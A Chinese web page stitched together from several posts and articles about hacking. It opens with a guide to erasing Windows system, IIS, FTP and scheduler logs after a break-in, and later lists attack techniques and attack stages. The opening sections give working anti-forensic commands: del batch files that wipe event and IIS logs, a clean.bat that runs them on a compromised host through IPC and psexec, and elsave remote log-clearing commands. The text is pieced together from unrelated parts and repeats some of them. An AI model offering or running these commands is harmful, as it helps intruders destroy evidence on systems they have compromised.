关于日志文件的清除。

说实话我不太懂,帮你 找到这篇文章,你研究一下好了:

什么是日志文件？它是一些文件系统 *** ，依靠建立起的各种数据的日志文件而存在。在任何系统发生崩溃或需要重新启动时，数据就遵从日志文件中的信息记录原封不动进行恢复。日志对于系统安全的作用是显而易见的，无论是 *** 管理员还是 黑客都非常重视日志，一个有经验的管理员往往能够迅速通过日志了解到系统的安全性能，而一个聪明的黑客会在入侵成功后迅速清除掉对自己不利的日志。无论是攻还是防，日志的重要性由此可见。下面我们就来简单讨论一下日志文件的清除 *** 。

一、日志文件的位置

Windows 2000的系统日志文件有应用程序日志，安全日志、系统日志、DNS服务器日志等等，应用程序日志、安全日志、系统日志、DNS日志默认位置：%systemroot%system32config。

安全日志文件：%systemroot%system32configSecEvent.EVT

系统日志文件：%systemroot%system32configSysEvent.EVT

应用程序日志文件：%systemroot%system32configAppEvent.EVT

有的管理员很可能将这些日志重定位（所以日志可能不在上面那些位置），其中EVENTLOG下面有很多的子表，在里面可查到以上日志的定位目录。

二、清除自己电脑中的日志

如果你要清除自己电脑中的日志，可以用管理员的身份来登录Windows，然后在“控制面板”中进入“管理工具”，再双击里面的“事件查看器”。打开后我们就可以在这里清除日志文件了，里面有应用程序、安全和系统日志文件。举个例子，比方说你想清除安全日志，可以右键点击“安全日志”，在弹出的菜单中选择“属性”。接下来在弹出的对话框中，点击下面“清除日志”按钮就可以清除了，如果你想以后再来清除这些日志的话，可以将“按需要改写尺寸”，这样就可以在达到更大日志尺寸时进行改写事件了，不会提示你清除日志。

三、清除远程主机上的日志

大多数情况下，IIS的日志会忠实地记录它接收到的任何请求（也有特殊的不被IIS记录的攻击），一个优秀的系统管理员会利用这点来发现入侵的企图，保护自己的系统。所以如果你是黑客，入侵系统成功后之一件事便是清除日志，擦去自己的形迹，这时可以用以下两个办法：一是自己编写批处理文件来解决，编写一个能清除日志的批处理非常简单， *** 是：新建一个具有如下内容的批处理文件：

@del c:winntsystem32logfiles*.*

@del c:winntsystem32config*.evt

@del c:winntsystem32dtclog*.*

@del c:winntsystem32*.log

@del c:winntsystem32*.txt

@del c:winnt*.txt

@del c:winnt*.log

@del c:del.bat

把上面的内容保存为del.bat备用。在上面的代码中echo是DOS下的回显命令，在它的前面加上“@”前缀字符，表示执行时本行在命令行或DOS里面不显示，另外del命令大家一定清楚吧？它是删除文件命令。

接下来再新建一个批处理文件，内容如下：

@copy del.bat ＼%1c$

@echo 向肉鸡复制本机的del.bat……OK

@psexec ＼%1 c:del.bat

@echo 在肉鸡上运行del.bat，清除日志文件……OK

保存为clean.bat即可，假设已经与肉鸡进行了Ipc连接，然后在CMD下输入：clean.bat 肉鸡IP，即可清除肉鸡上的日志文件。

清除日志的另外一个 *** 是借助第三方软件，如著名黑客软件流光的开发者黑客小榕的elsave.exe，就是是一款可以远程清除系统日志、应用程序日志、安全日志的软件，大家可以在网上下载到。elsave.exe使用起来很简单，首先利用获得的管理员账号与对方建立IPC会话：net use ＼ip pass /user: user，然后在命令行下执行如下命令：elsave -s ＼ip -l application -C，这样就删除了安全日志。

一般所谓的黑客在入侵完电脑后都要删除日志，是哪个日志，怎么打开查看？

1) Scheduler日志

Scheduler服务日志默认位置：2000下: %sys temroot%\schedlgu.txt NTworkstation下为 SchedLog.txt

可以打开schedlgu.txt

Schedluler服务日志在注册表中

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Sche *** ngAgent

先停掉他 net stop "task scheduler" (注意不停是删不掉的)

然后再 del schedlgu.txt 或 schedlog.txt之后就OK了.

del sched*.txt

不过你如果不想删他,也可以改改它. 他的内容是这样的:

" "任务计划程序服务"

已退出于 01-5-22 20:37:34

"任务计划程序服务"

已启动于 01-5-25 7:07:37

"任务计划程序服务"

已启动于 01-5-25 7:26:36

"任务计划程序服务"

已退出于 01-5-25 8:47:54 "

很好改的.

(2) FTP日志

Internet信息服务FTP日志默认位置：%sys temroot%\sys tem32\logfiles\msftpsvc1\，默认每天一个日志.

格式是这样的 ex*.log .

注意这是一台NT4的LOGFILES下的文件:

这台服务器下管理有多个HTTP或FTP站点

c:\winnt\sys tem32\logfiles 的目录

00-12-04 06:28p .

00-12-04 06:28p ..

01-05-18 12:56p MSFTPSVC1

01-04-23 11:28a MSFTPSVC2

01-01-12 11:56a MSFTPSVC3

01-06-01 08:12a *** TPSVC1

01-09-20 08:55a W3SVC1

01-08-02 10:36a W3SVC10

01-10-11 04:48p W3SVC11

01-07-11 09:16a W3SVC2

01-10-11 10:31a W3SVC3

01-10-10 04:55p W3SVC4

01-09-28 01:43p W3SVC5

01-10-11 08:44a W3SVC6

01-10-11 08:00a W3SVC7

01-09-30 01:49p W3SVC8

01-10-11 08:03a W3SVC9

看看日志文件的格式:

c:\winnt\sys tem32\logfiles\msftpsvc1\in010306.log

192.168.5.8, anonymous, 01-3-6, 16:41:51, MSFTPSVC1, APPSERVER, 192.168.5.8, 0,

0, 0, 331, 0, [3]USER, anonymous, -,

192.168.5.8, -, 01-3-6, 16:41:51, MSFTPSVC1, APPSERVER, 192.168.5.8, 0, 0, 0, 53

0, 1326, [3]PASS, IE30User@, -,

关于LOG文件的含意我就不解释了,浪费时间,嘿嘿.

法一: 这个时侯 net stop msftpsvc 停掉后台服务.

然后尽管 del 看这删吧,不要删的过火,把当天的删了就行. 别忘了再NET START MSFTPSVC 把服务打开.

法二: 当然你如果还想更好,那就改改日志,可以改了系统时间后再改日志,只把你的清了,别忘了把时间改回来哦

实际上在得到ADMIN权限后,做这些事很容易.

法三:) 最傻瓜的清FTP日志的 *** , cleaniislog 小蓉写的工具,不用我再教了吧!

(3) WWW日志

Internet信息服务WWW日志默认位置：%sys temroot%\sys tem32\logfiles\w3svc1\，默认每天一个日志

注意这是一台NT4的LOGFILES下的文件:

这台服务器下管理有多个HTTP或FTP站点

c:\winnt\sys tem32\logfiles 的目录

00-12-04 06:28p .

00-12-04 06:28p ..

01-05-18 12:56p MSFTPSVC1

01-04-23 11:28a MSFTPSVC2

01-01-12 11:56a MSFTPSVC3

01-06-01 08:12a *** TPSVC1

01-09-20 08:55a W3SVC1

01-08-02 10:36a W3SVC10

01-10-11 04:48p W3SVC11

01-07-11 09:16a W3SVC2

01-10-11 10:31a W3SVC3

01-10-10 04:55p W3SVC4

01-09-28 01:43p W3SVC5

01-10-11 08:44a W3SVC6

01-10-11 08:00a W3SVC7

01-09-30 01:49p W3SVC8

01-10-11 08:03a W3SVC9

w3svc1 下的文件:

黑客入侵后，会清除入侵记录，请问下谁知道清除记录的命令是什么啊？

清除记录的命令：

del C:\winnt\system32\logfiles\*.*

del C:\winnt\system32\config\*.evt

del C:\winnt\system32\dtclog\*.*

del C:\winnt\system32\*.log

del C:\winnt\system32\*.txt

del C:\winnt\*.txt

del C:\winnt\*.log

怎样发现黑客入侵对于追踪很重要

　如果当你受到黑客攻击之后，都很想搞清楚自哪里，是什么人在攻击自己，这样我们就可以有针对性的进行黑客的防范工作。那么如何才能作到这一点呢？这就需要我们对黑客进行追踪，并把黑客的老底给“掏”出来，这其中有很多门道，实现起来也有一定的难度。本章针对普通用户的防黑需求介绍了从发现黑客入侵到追踪黑客的各种 *** ，目的是让读者读完本章之后对追踪黑客的技术有个大致的了解，读完本章之后，你会发现追踪黑客是很吸引人的事情。

如何发现黑客入侵

及时发现黑客入侵对于能否成功地进行追踪是至关重要的，但很多的黑客入侵事件并不为人们所知，因为黑客入侵有时持续的时间很短，在人们还没有发觉的时候攻击就已经结束了。而且比较高明的黑客在入侵完成后还要隐藏或删除自己入侵的痕迹，所以如果发现得晚，黑客可能把一些日志等相关的文档删掉了，给追踪带来很大的难度。

本文中首先以CA的eTrust

Intrusion

Detection（入侵检测系统）为例，介绍关于专业入侵检测系统的知识，然后再介绍没有入侵检测系统的时候如何来发现黑客入侵。

黑客入侵的手法包括哪几种.????..````

黑客入侵的手法包括1)瞒天过海 (2)趁火打劫 (3)无中生有 (4)暗渡陈仓 (5)舌里藏刀 (6)顺手牵羊 (7)供尸还魂 (8)调虎离山 (9)抛砖引玉 (10)湿水摸鱼 (11)远交近攻 (12)偷梁换柱 (13)反客为主。黑客常有连环计，防不胜防，不可不小心。

1、瞒天过海，数据驱动攻击

当有些表面看来无害的特殊程序在被发送或复制到 *** 主机上并被执行发起攻击时，就会发生数据驱动攻击。例如:一种数据驱动的攻击可以造成一台主机修改与 *** 安全有关的文件，从而使黑客下一次更容易入侵该系统。

2、趁火打劫，系统文件非法利用

UNIX系统可执行文件的目录，如/bin/who可由所有的用户进行读访问。有些用户可以从可执行文件中得到其版本号，从而结合已公布的资料知道系统会具有什么样的漏洞。如通过Telnet指令操行就可以知道Sendmail的版本号。禁止对可执文件的访问虽不能防止黑客对它们的攻击，但至少可以使这种攻击变得更困难。还有一些弱点是由配置文件、访问控制文件和缺省初始化文件产生的。最出名一个例子是:用来安装SunOS Version 4的软件，它创建了一个/rhosts文件，这个文件允许局域网(因特网)上的任何人，从任何地方取得对该主机的超级用户特权。当然，最初这个文件的设置是为了从网上方便地进行安装，而不需超级用户的允许和检查。智者千虑，必有一失，操作系统设计的漏洞为黑客开户了后门，针对WIN95/WIN NT一系列具体攻击就是很好的实例。

3、无中生有，伪造信息攻击

通过发送伪造的路由信息，构造系统源主机和目标主机的虚假路径，从而使流向目标主机的数据包均经过攻击者的系统主机。这样就给人提供敏感的信息和有用的密码。

4、暗渡陈仓，针对信息协议弱点攻击

IP地址的源路径选项允许IP数据包自己选择一条通往系统目的主机的路径。设想攻击者试图与防火墙后面的一个不可到达主机A连接。他只需要在送出的请求报文中设置IP源路径选项，使报文有一个目的地址指向防火墙，而最终地址是主机A。当报文到达防火墙时被允许通过，因为它指向防火墙而不是主机A。防火墙的IP层处理该报文的源路径被改变，并发送到内部网上，报文就这样到达了不可到达的主机A。

5、笑里藏刀，远端操纵

缺省的登录界面(shell scripts)、配置和客户文件是另个问题区域，它们提供了一个简单的 *** 来配置一个程序的执行环境。这有时会引起远端操纵攻击:在被攻击主机上启动一个可执行程序，该程序显示一个伪造的登录界面。当用户在这个伪装的界面上输入登录信息(用户名、密码等)后，该程序将用户输入的信息传送到攻击者主机，然后关闭界面给出“系统故障”的提示信息，要求用户重新登录。此后才会出现真正的登录界面。在我们能够得到新一代更加完善的操作系统版本之前，类似的攻击仍会发生。防火墙的一个重要作用就是防止非法用户登录到受保护网的主机上。例如可以在进行报文过滤时，禁止外部主机Telnet登录到内部主机上。

6、顺手牵羊，利用系统管理员失误攻击

*** 安全的重要因素之一就是人! 无数历史事实表明:保垒最容易从内攻破。因而人为的失误，如WWW服务器系统的配置差错，普通用户使用户使用权限扩大，这样就给黑客造成了可趁之机。黑客常利用系统管理员的失误，收集攻击信息。如用finger、netstat、arp、mail、grep等命令和一些黑客工具软件。

7、借尸还魂，重新发送(REPLAY)攻击

收集特定的IP数据包;篡改其数据，然后再一一重新发送，欺骗接收的主机。

8、调虎离山，声东击西

对ICMP报文的攻击，尽管比较困难，黑客们有时也使用ICMP报文进行攻击。重定向消息可以改变路由列表，路由器可以根据这些消息建议主机走另一条更好的路径。攻击者可以有效地利用重定向消息把连接转向一个不可靠的主机或路径，或使所有报文通过一个不可靠主机来转发。对付这种威肋的 *** 是对所有ICMP重定向报文进行过滤，有的路由软件可对此进行配置。单纯地抛弃所有重定向报文是不可取的:主机和路由器常常会用到它们，如一个路器发生故障时。

9、抛砖引玉，针对源路径选项的弱点攻击

强制报文通过一个特定的路径到达目的主机。这样的报文可以用来攻陷防火墙和欺骗主机。一个外部攻击者可以传送一个具有内部主机地址的源路径报文。服务器会相信这个报文并对攻击者发回答报文，因为这是IP的源路径选项要求。对付这种攻击更好的办法是配置好路由器，使它抛弃那些由外部网进来的却声称是内部主机的报文。

10、混水摸鱼，以太网广播攻击

将以太网接口置为乱模式(promiscuous)，截获局部范围的所有数据包，为我所用。

11、远交近攻，跳跃式攻击

现在许多因特网上的站点使用UNIX操作系统。黑客们会设法先登录到一台UNIX的主机上，通过该操作系统的漏洞来取得系统特权，然后再以此为据点访问其余主机，这被称为跳跃(Island-hopping)。

黑客们在达到目的主机之前往往会这样跳几次。例如一个在美国黑客在进入美联邦调查局的 *** 之前，可能会先登录到亚洲的一台主机上，再从那里登录到加拿大的一台主机，然后再跳到欧洲，最后从法国的一台主机向联邦调查局发起攻击。这样被攻击 *** 即使发现了黑客是从何处向自己发起了攻击，管理人员也很难顺藤摸瓜找回去，更何况黑客在取得某台主机的系统特权后，可以在退出时删掉系统日志，把“藤”割断。你只要能够登录到UNIX系统上，就能相对容易成为超级用户，这使得它同时成为黑客和安全专家们的关注点。

12、偷梁换柱，窃取TCP协议连接

*** 互连协议也存在许多易受攻击的地方。而且互连协议的最初产生本来就是为了更方便信息的交流，因此设计者对安全方面很少甚至不去考虑。针对安全协议的分析成为攻击的最历害一招。

在几乎所有由UNIX实现的协议族中，存在着一个久为人知的漏洞，这个漏沿使得窃取TCP连接成为可能。当TCP连接正在建立时，服务器用一个含有初始序列号的答报文来确认用户请求。这个序列号无特殊要求，只要是唯一的就可以了。客户端收到回答后，再对其确认一次，连接便建立了。TCP协议规范要求每秒更换序列号25万次。但大多数的UNIX系统实际更换频率远小于此数量，而且下一次更换的数字往往是可以预知的。而黑客正是有这种可预知服务器初始序列号的能力使得攻击可以完成。唯一可以防治这种攻击的 *** 是使初始序列号的产生更具有随机性。最安全的解决 *** 是用加密算法产生初始序列号。额外的CPU运算负载对现在的硬件速度来说是可以忽略的。

13、反客为主，夺取系统控制权

在UNIX系统下，太多的文件是只能由超级用户拥有，而很少是可以由某一类用户所有，这使得管理员必须在root下进行各种操作，这种做法并不是很安全的。黑客攻击首要对象就是root，最常受到攻击的目标是超级用户Password。严格来说，UNIX下的用户密码是没有加密的，它只是作为DES算法加密一个常用字符串的密钥。现在出现了许多用来解密的软件工具，它们利用CPU的高速度究尽式搜索密码。攻击一旦成功，黑客就会成为UNIX系统中的皇帝。因此，将系统中的权利进行三权分立，如果设定邮件系统管理员管理，那么邮件系统邮件管理员可以在不具有超级用户特权的情况下很好地管理邮件系统，这会使系统安全很多。

此外，攻击者攻破系统后，常使用金蝉脱壳之计删除系统运行日志，使自己不被系统管理员发现，便以后东山再起。故有用兵之道，以计为首之说，作为 *** 攻击者会竭尽一切可能的 *** ，使用各种计谋来攻击目标系统。这就是所谓的三十六计中的连环计。

黑客攻击的三个阶段是什么？黑客在这三个阶段分别完成什么工作？

1. 锁定目标

攻击的之一步就是要确定目标的位置，在互联网上，就是要知道这台主机的域名或者IP地址, 知道了要攻击目标的位置还不够，还需要了解系统类型、操作系统、所提供的服务等全面的资料，如何获取相关信息，下面我们将详细介绍。

2. 信息收集

如何才能了解到目标的系统类型、操作系统、提供的服务等全面的资料呢?黑客一般会利用下列的公开协议或工具来收集目标的相关信息。

(1)SNMP 协议：用来查阅 *** 系统路由器的路由表，从而了解目标主机所在 *** 的拓扑结构及其内部细节;

(2)TraceRoute程序：用该程序获得到达目标主机所要经过的 *** 数和路由器数;

(3)Whois协议：该协议的服务信息能提供所有有关的DNS域和相关的管理参数;

(4)DNS服务器：该服务器提供了系统中可以访问的主机的IP地址表和它们所对应的主机名;

(5)Finger协议：用来获取一个指定主机上的所有用户的详细信息(如注册名、 *** 号码、最后注册时间以及他们有没有读邮件等等);

(6)ping：可以用来确定一个指定的主机的位置;

(7)自动Wardialing软件：可以向目标站点一次连续拨出大批 *** 号码，直到遇到某一正确的号码使其MODEM响应为止。

3. 系统分析

当一个黑客锁定目标之后，黑客就开始扫描分析系统的安全弱点了。黑客一般可能使用下列方式来自动扫描驻留在 *** 上的主机。

(1)自编入侵程序

对于某些产品或者系统，已经发现了一些安全漏洞，该产品或系统的厂商或组织会提供一些“补丁”程序来进行弥补。但是有些系统常常没有及时打补丁，当黑客发现这些“补丁”程序的接口后就会自己编写能够从接口入侵的程序，通过这个接口进入目标系统，这时系统对于黑客来讲就变得一览无余了。

(2)利用公开的工具

像 Internet 的电子安全扫描程序 ISS(Intemet Security Scanner)、审计 *** 用的安全分析工具 SATAN ( Securi Ana1ysis Tool for Auditing Network)等。这些工具可以对整个 *** 或子网进行扫描，寻找安全漏洞。这些工具都有两面性，就看是什么人在使用它们了。系统管理员可以使用它们来帮助发现其管理的 *** 系统内部隐藏的安全漏洞，从而确定系统中哪些主机需要用“补丁”程序去堵塞漏洞，从而提高 *** 的安全性能。而如果被黑客所利用，则可能通过它们来收集目标系统的信息，发现漏洞后进行入侵并可能获取目标系统的非法访问权。

4. 发动攻击

完成了对目标的扫描和分析，找到系统的安全弱点或漏洞后，那就是万事具备，只欠攻击了，接下来是黑客们要做的关键步骤——发动攻击。

黑客一旦获得了对你的系统的访问权后，可能有下述多种选择：

(1)试图毁掉攻击入侵的痕迹，并在受到损害的系统上建立另外的新的安全漏洞或后门，以便在先前的攻击点被发现之后，继续访问这个系统;

(2)在你的系统中安装探测软件，包括木马等，用以掌握你的一切活动，以收集他比较感兴趣的东西(不要以为人人都想偷窥你的信件，人家更感兴趣的是你的电子银行帐号和密码之类);

(3)如果你是在一个局域网中，黑客就可能会利用你的电脑作为对整个 *** 展开攻击的大本营，这时你不仅是受害者，而且还会成为帮凶和替罪羊。

黑客是一个中文词语，皆源自英文hacker，随着灰鸽子的出现，灰鸽子成为了很多假借黑客名义控制他人电脑的黑客技术，于是出现了“骇客”与"黑客"分家。2012年电影频道节目中心出品的电影《骇客（Hacker) 》也已经开始使用骇客一词，显示出中文使用习惯的趋同。实际上，黑客（或骇客）与英文原文Hacker、Cracker等含义不能够达到完全对译，这是中英文语言词汇各自发展中形成的差异。Hacker一词，最初曾指热心于计算机技术、水平高超的电脑专家，尤其是程序设计人员，逐渐区分为白帽、灰帽、黑帽等，其中黑帽（black hat）实际就是cracker。在媒体报道中，黑客一词常指那些软件骇客（software cracker），而与黑客（黑帽子）相对的则是白帽子。

黑客在入侵系统后，一定会留下证据吗？

没有人可以踏网无痕，因为所有人都是通过电信服务商连入互联网的。

黑客们可以通过一定的手段制造“假痕迹”来增加侦破难度，但如果是严重的入侵，到了不得不追查的时候，没有找不到的例子；只不过时间和程序要付出更多～